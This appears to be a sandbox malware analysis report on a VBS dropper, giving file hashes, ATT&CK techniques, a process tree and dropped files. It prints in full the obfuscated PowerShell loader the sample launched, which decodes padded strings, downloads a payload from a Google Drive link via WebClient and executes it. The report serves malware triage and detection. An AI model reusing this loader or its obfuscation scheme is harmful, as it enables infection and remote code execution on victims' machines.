1e009a22794bd1f20f0178e262db52562fa7f76a356e14823cb2b20c4d2f960b

General

Target

1e009a22794bd1f20f0178e262db52562fa7f76a356e14823cb2b20c4d2f960b.vbs
Size

23KB
MD5

197818f6c847f13b3cd19e62589da0eb
SHA1

6893932719be859690beadbd5ad6ff6b5e219a3a
SHA256

1e009a22794bd1f20f0178e262db52562fa7f76a356e14823cb2b20c4d2f960b
SHA512

a035f7b19cae1a5f625c2e136187072b801b6a3f7c11b263b0a23b87bfd7af8c332d7d94e2951de7fc9b384f5a4beaaa45a718e5a26c52fd2d8efc6eea7b60c2
SSDEEP

384:cGk2uAnXd99Rw6UyY2ExvWSOixGM3ciyQB8D3ud2cOobQvz/Js2+Y76:cT2l517nwzcEB8ru/vY76

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 3 IoCs

flow	pid	Process
4	2216	WScript.exe
9	2860	powershell.exe
11	2860	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Control Panel\International\Geo\Nation	WScript.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
9	drive.google.com
8	drive.google.com

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2860	powershell.exe
2860	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	2860	powershell.exe

Suspicious use of WriteProcessMemory 4 IoCs

description	pid	Process	procid_target
PID 2216 wrote to memory of 2860	2216	WScript.exe	81
PID 2216 wrote to memory of 2860	2216	WScript.exe	81
PID 2860 wrote to memory of 2296	2860	powershell.exe	83
PID 2860 wrote to memory of 2296	2860	powershell.exe	83

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\1e009a22794bd1f20f0178e262db52562fa7f76a356e14823cb2b20c4d2f960b.vbs"
1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2216
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Phytogenic = 1;Function Abulia($Skraale){$Foundational=$Skraale.Length-$Phytogenic;$Tilkommen='Substring';For( $Bacteriohemolysin=7;$Bacteriohemolysin -lt $Foundational;$Bacteriohemolysin+=8){$Misthinks+=$Skraale.$Tilkommen.Invoke( $Bacteriohemolysin, $Phytogenic);}$Misthinks;}function Ifrelsernes($Trakkasseriet51){ . ($Disomatic) ($Trakkasseriet51);}$Frankotvang=Abulia 'SammensMRetanneoLoudensz WiretaiXer,maclUndersalSte,pelaPrefulg/ubesi d5Bisinua.Forbrug0Flamepr Telegn(Combi eWStinksvi KrlninnLuminisd Hvlsp,oUn.emaiwBlokf,isPer,pek Un,runkNsalgsstT Gen.em Modstn1Vrdighe0Sjaskre.unpuck.0Halvft ;Pros.cu R.tslrdWt,dsopdiDallysenMundunu6Bernici4Tvangsa;C.ntroi compl x Featur6Orbitsp4Backhoe;Krrenss Obje.tirTelephovOvermaa:Col,pla1Massivt2V,ndfal1Neokolo.Muonium0Ter ing) Sortbr Enh aveG bedreseDiverticOenskesk Progr.oTownsit/ Pr cis2,ostano0 Myosit1.referh0Copperh0Komm.so1Slagsty0 Ste.os1 Weens, OrbiculFMet.anuiForhandrGoders eLubricafdisconno BeetlexNonprac/Albsste1antropo2Pneu,on1Farmors. Progra0Aktivst ';$Monde=Abulia 'UntidilUSkos,rtsSelskabesmeekedrBrdnide-LigaturASortmejg VrinskeSpejlmonFjolleht betnks ';$rumorous=Abulia 'Poste.ih OsmundtActino tOmslyngpChalinas Tr,ckf: Dojoar/Tzarist/Dyn.lspdprotomirHel ediiBioanalvDokumeneNona.ge.equ.poigFlankero Strgh.oSatirisgTankelslSty keleCoracle.,ormasacEngineroForstuvmA.tityr/PerineuuKyri.lfcAlfarve?FolkesteForetokxUsaa,bapSandpumoSattertrTepefietFragtmn=um.liusdU.wrinkoBekrigew Orato.n SurfaclImplyinodiskfejaFangersd.ibilat&Dig.naliEkskommdBilledb=Kimende1Folkere1IncommuwBolsh.eNAf,opni7NeedlebMEngro,htStranspd bierstK Furiesz Uddi tq AlpheaA iscompFMue,tet1 ValeriQMutant.wTomorrof Indfa.JEndotrawRunklysPUnsqueeobandura4 CerebriChapelmg OxhoftcHarmoni9BhutanelVkstpoleOrpheusUMissilesIndope,T Udh.gnR.alborgxkatalog ';$sprogfejls=Abulia 'Poiente>Predefi ';$Disomatic=Abulia 'TellsopiNorbergeS andarxSolemni ';$Kluppernes='cargoes';$Udbyg = Abulia 'fuldfreesmreostcSpn.inghTry lekoWid wer Sacr ve%Sttteora LepidopKo munep OverstdKbebeneaBlasfemtEventyraVuggge,% Mimose\ uimpeRGangestaRigmandctamgscoeRegrowta Kor endRetrocos blindfkPhytogei gilitil,hmndsalEnneaeteldrecenlSemitrosYaf.lerePrves pnElectres Annabe.Ho erebELerduesk liments,rbicul Po,tmor&Skydnin&Margeun SurrogaeCebri,ec tympanhIsolereoAgricul Modsv.rtGorgeab ';Ifrelsernes (Abulia 'Dyrekro$ AcocangNuditarlB gfinnogy,atiob WettisatarmenelU trigg:Plnekl,NMagnetpeFor.olduUn.torerVamp.reoMaraudspUdtringsFeers,ayPraeneskwaterheoB holdnlNoncon oFeltmadgpreambliSnobbes=Aggres ( P ndercBestrgnmFrstedadBleater Starree/ HospitcSletsst improvi$MalacodUfyrvrkedEmowillbFremtidy B,kkesgStangla)sprogfo ');Ifrelsernes (Abulia ' U,dema$Atama.sgForsinklDbefonto omskifbUn.turlaAtomistlKnurryh:DeformeHNonhectyCrucifedQuattu rBetragtoSpndeskpEnemrk.hI tenseoVildestr PrimipiPlasticaMicropa1Sextari0 Seatwo1Turbola=Grafitt$ Acetylrmicr buuTankedemphoenicoDolkhalrKodestroSna.shouSumptios Tc,def.Inc,rces ProtagpEkstravl HedisbiUnskepttGe,logs(Motivet$C,llfalsM,gaworp Erhverr SvineroGyesreggMerriesf KaffeheTurbinajV skesblCi.atris Ade.sk)Balance ');$rumorous=$Hydrophoria101[0];$Storified= (Abulia 'Krabask$ HebdomgHatterilSakellioGu.linebVithusaaSvmmebalKnap.ag: F,okosH Brookey Kontorp FonoloeP,ecompr Klar.rmForstrko,hemiserUnglimpp,ilmstjhOvermuci PsykiacOli,opo=BehooveNSuf,useePharyngw Lno.er-Trol,ndOMarkdowbHik texjEylevcaeCentralcPopulartInterpa HemorrhSTraine yLg.deposFusionst Gowfe.e FlexiomSm.ggle.Beav reNversifie Finer.tAnagene.AchromaWPyralideTophemmbGasteroCSharpe,lBog.ussi ngslieCoryphan Upg,tht');$Storified+=$Neuropsykologi[1];Ifrelsernes ($Storified);Ifrelsernes (Abulia 'bredest$ ElectrHAdoptioy Ext.ngpGnarrineLaciestr EksorcmGtev enoSpidsh.rNonnumepSprinklhHoreungi.jrnskocDrt.ine.ReindexHClioneaeJomfrufasatsmuldBra.dere T.rnenrRepatrosGenbrug[ Sidelo$Po.tiaeMantistoojor rysnGodskridAttr kte engang]Reduitn=Flemest$SubversFPatologrOpenedcaCongaernUnlaughkFalholdoDrgrebetNonde,avTwinkl,a Skyldnn Enzymog Redego ');$Sjasker=Abulia 'T.dsbun$UsneaceH Husbaay.nnotatpPedagogeGod.oonrMaskinsmCapacito UnqualrInval dp Stal chDec,duaiP easancHyaeni .Ind,speDAl ctoroCusteriwAsiderinmikrosklTrirhomoSalpeteaPhilos.d Ka,pieFcanoniciAntib.sl Eksamie Na,cis(Sta sma$Ener.iurTidspriu Tele hmAmobarboFiduci,rMeigomio Fr,mdeuEgnet esWhirla,,Skovman$thorst.HSideopdyVaporarpf otagee Lionisr ericulm MutualnKvalitee clasp sRoadiesi,piniassKontoha)Overhur ';$Hypermnesis=$Neuropsykologi[0];Ifrelsernes (Abulia ' ,aelke$ Wimpl,gBrsnotel NonbuyoRelig,ob Co,odiaHemithylAmbodex:D orusuVRumexdaaG.otenuk T knokuA.gledouInddatamChinsabpMis uota mnibuskAn ispikFartblleBanza,tn Orth.cd Tumm eeKubiste=Sparek.(HusmandTMiljbese Dem,ras Overf tBilagen-Hyphom PredivivaArgume,ttizwinshSkbnebe mnem ni$noninciHBrysth.yAcc,lerpProcente U,unstrFotohanmA muesknSideroseOxyblepsParalleiFysiolosIsocitr)Nnneth ');while (!$Vakuumpakkende) {Ifrelsernes (Abulia ' St ame$ Kerat.g mponerlDeparteoIcht.yob SquaweaIsthmiclIncoach: .nindiF ekstreoStutterrUglesdosSchat,miB omkaakCro chsrMingieliPassivinI.lustrgColl,qusYourtspuSyesh.ddAm.hibigAgg,egaiAnmeldefpetiol,tEgetforsBerling=Microcy$ BuckodtUndecenr deologuSttte.oe Unneur ') ;Ifrelsernes $Sjasker;Ifrelsernes (Abulia 'Frigno,SPaurometKortadraBestowirK.editstDinosau- DefuncS NorthelSc,ibateHandl,neFrynsetpDecor u Bnde,or4,iggers ');Ifrelsernes (Abulia 'Aiesavi$ Ey.ssdgRegresklAn ammeoSkivesnbMimiskraGyn,collUvidenh:ImpersoVFamilieakarshaskKmpe,isu SkrfsfuDeatha,m Tu,abipUbelastaPjaltetkEkspatrkoutliveeHjforrdn Vestu,d StemmeeTranspa=Pludder(FarveklTNit.idieDatamassshrugsftcrinicu- ralretPMonocaraUdskilltDisks.eh Efters astonis$uskadelHPythoniyJollif.p SkivebeFew rilrPerce,vmHjlp fonP,eudose D.spons NonindiCharacis anihot)P enumd ') ;Ifrelsernes (Abulia 'Onarisf$Digestog tatiktl S,rraio Arcualb Bill.dabrdbilllMulatto:uddunstD ingeniaForldrel FdestelUtilstriStjdmpeaCaulifonHallo,tcUdf ktueBid.agssMiddl b=Ind,ksm$ dipodigTelefonlBrandf oDobbeltbTopgrafaLigebe.l elaant:Hyrevo A,enitensCo.pingp Befez rClammeri NektonnMa colrgSuperor+Snickdr+ Hoveds%Patriot$JehovisHNocturnyMylomard Ko,fderTigerjeoSuperhapIndeksnh GeneraoBivuakerThunderi GumptiaFllesin1Antifon0Kortslu1 Forfan.CervicocskylighoNon onsuSkrinlgnBalleprtNunciot ') ;$rumorous=$Hydrophoria101[$Dalliances];}$Lixiviates=358088;$amine=30186;Ifrelsernes (Abulia 'Interpe$ Konfidg KampbelSparreroSerieprbGruppesaPlatit lSubmari:biocyclJ,chalbua,iskehaeSyle,shvUnconfonDuttendaIndentllForsvrgdStorkunr.hitefieHybenetnEkoimondM.ntalhe Ga.mel Trans.o=Nyroman NonresGingenuiePompi ntModersk-Seg,egaCSai douoScopernnBroderitDegnesteBoisternTalehretInde,in egenvg$ EndemoH bant,sySalva.epDisord,eMontgolrdaisistmHepatolnMabl.ngetillbersUnplentiCoen,mosdoktord ');Ifrelsernes (Abulia 'Relater$Incentig.minsbilPu,cticoXirax rbPrincipaS.aapakl Genera:ReviverSHurricatDam.reniLeveda.l Au.harl Basicie Ceco rvReggeame,tilemnjpo itiosepididyoKvletsmmmelato,raxis mmaHal.nasaUrosepsdVildfreeStagnat Occamis= Fldete Panorer[Pli,pitS TidsflyUbjetc,sPaatryktSm,laaseCareiremCultusr. iktatuCCroos.uoTerminanRearguevhundeaneUncolorrBlottsltRemssab]Un.nnoc:Kiwinro:FrugtsoF Informr CarsteoFa.etsgm lufrdiBAfhjlpea BrogmosNothingeLigesti6materie4 unawfuSKlassiftInst.turHjagtetiBesparenIsb okkg Sydame( Muscul$HansardJforlorea stol.mebaaskaav Ule,pen EnteroaMovereslTommeafdRitualir Baba,leStartprn eskikkdSlvsgooeFidelt,) Kerati ');Ifrelsernes (Abulia ' Opslag$G,ungiegDemerarl.itigato Pat.llb SpartlaSangbgelSinolog: ug ldiPOverf.ohEgenpeno OrlonrsSmaaovepDahabeah,mericaa ZygosptSaarraniSkafnincIndskri Umtteli=.enopia landsle[IndustrS Brist.yOutcasts F,rpupt YuitubeDaahjormSaarfeb. La,dsrTtelevieeOverfatxR darovtData,ty.Sl.gkraESul aninSnoblincSig,rstoPrventidMotliesiDemisoln Epic,eg,ensmar]Vandret:Jeewhil:permutaA Sniks,SPolianuCIngeburIFr.msigISvips.n. StressGStr mmee Uslebnt,ntiewhS DussertBooke,irPlethodikertr.nn Sli.kegBegrav,(Myelatr$NdsagemS SlaanitkursusliBredbaal KitalplShantyeeVerden vNonvolceLo kletjbru.erasLnklassoAldimedm Qui dirPaalggeane.skriaKryolitd Ungdome Spor,p)Alde,ma ');Ifrelsernes (Abulia 'Chemoth$RerubbagCondolilBin,miao SammenbLavoltaaSennep lPrestim:Necrobip gr,llros.ampero errati=Shippin$ShmoozePHyretsdhAutacoio vlstvesJustitspPron mphHoughfoaPreendotan umzeiBulterbc S,magt.AntilipsMycop,ouUdstenib subaposEpigr ptScler,mr,rhverviMilieumnSwooningTrainma(In erio$UserspoL Fldeski Patr.nxRugolasiPerambuv AksecyiS,idsenaGe ottet Turmo.eSelvsamsGrdesa , Svensk$AskesgraruralesmSastrugiTagrretnbirdshoeMon.chl)Elstona ');Ifrelsernes $poo;"
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2860
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Raceadskillelsens.Eks && echo t"
    3⤵
    PID:2296

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Web Service

1

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\Pilars.txt

Filesize
6KB

MD5
38c62a43155edd124f8c1373d301159a

SHA1
24c99d14be3c02a453442baa5e1bfbf9421effda

SHA256
6ef33dbf4dce295d564d122d83e50f3ac24a20c67d985264d864b13349fcab6b

SHA512
05004947496c4fbb758623acd6c586190594d3516c5e3a2742ec1f93d6b6b0d76a86b756951260c419db981d141bd1b4452e3579d700284f2d2f16263e095e9c

Download Submit
C:\Users\Admin\AppData\Local\Temp\Pilars.txt

Filesize
420B

MD5
e87744103015dc7c37cede135476ea7d

SHA1
8578f80337df21a659d7daa42cbebd2003c33a60

SHA256
0d8735f69587984e435d632e109caa7e23de142f1901cccae0af979f59984d06

SHA512
c2fab94bf1099a28af2d62106a35ec05f3e7600e09b9cbc930f34818a9489d891762af45076713d7d9789ac6359582b6a36ea8c1611d7965676cb757e7554ec7

Download Submit
C:\Users\Admin\AppData\Local\Temp\Pilars.txt

Filesize
1KB

MD5
295380d7db53a1450880e038e364ec05

SHA1
6d8e752282026ff85d0106e4601e664eac3b577f

SHA256
ddf7d553c4ac746ee4ce751b7635ec3236f44afd3c733acf77726bbffc845ca2

SHA512
7a55646a5a5fc987abbc03f001051df932de5b2ba7ccb3fd3eacb7f323f6a20e4d22a516b3e4192f9d22874052332eca0aadc0b77e56728a1028cc3f6716ef31

Download Submit
C:\Users\Admin\AppData\Local\Temp\Pilars.txt

Filesize
3KB

MD5
7ad80b747515a417a6c756968388da7e

SHA1
db739f425c523804d2b3bc9ccc63e251f50eb2bf

SHA256
ccfcb26c6776437cacec8f78306d920829ee77375f7eb53c4e3ba95ca452a715

SHA512
47a3315e9a9796a8dffcfc23720236fdb9fecb4724e63410005ef7c00dfbd89cbc4a57a2e2ba184c88efb6ff48ddf47ee5cf443243de71973ab161e26667ef69

Download Submit
C:\Users\Admin\AppData\Local\Temp\Pilars.txt

Filesize
3KB

MD5
597f4a7ab9c92d9fe9e001972edbafb3

SHA1
cb6c1e2a2f380995f1eea3c5c45547f67b008ca2

SHA256
55adeeb20176cef2b679c397707851db34273d7e3efb41acabb5cf57c5631694

SHA512
a62ef1c3811f9cc5bbd2c6ab123809604a423a31620965ff91eeb2b428a5baa030cc5214a8242f55afcdcb1d03de91169bd0658ccb952d9fc0cbd16bd62939a9

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_25luyttq.4wu.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/2860-307-0x00007FFB83F33000-0x00007FFB83F35000-memory.dmp

Filesize
8KB

Download
memory/2860-308-0x0000020C1D3B0000-0x0000020C1D3D2000-memory.dmp

Filesize
136KB

Download
memory/2860-318-0x00007FFB83F30000-0x00007FFB849F1000-memory.dmp

Filesize
10.8MB

Download
memory/2860-319-0x00007FFB83F30000-0x00007FFB849F1000-memory.dmp

Filesize
10.8MB

Download
memory/2860-322-0x00007FFB83F30000-0x00007FFB849F1000-memory.dmp

Filesize
10.8MB

Download
memory/2860-325-0x00007FFB83F30000-0x00007FFB849F1000-memory.dmp

Filesize
10.8MB

Download

Analysis

Sharing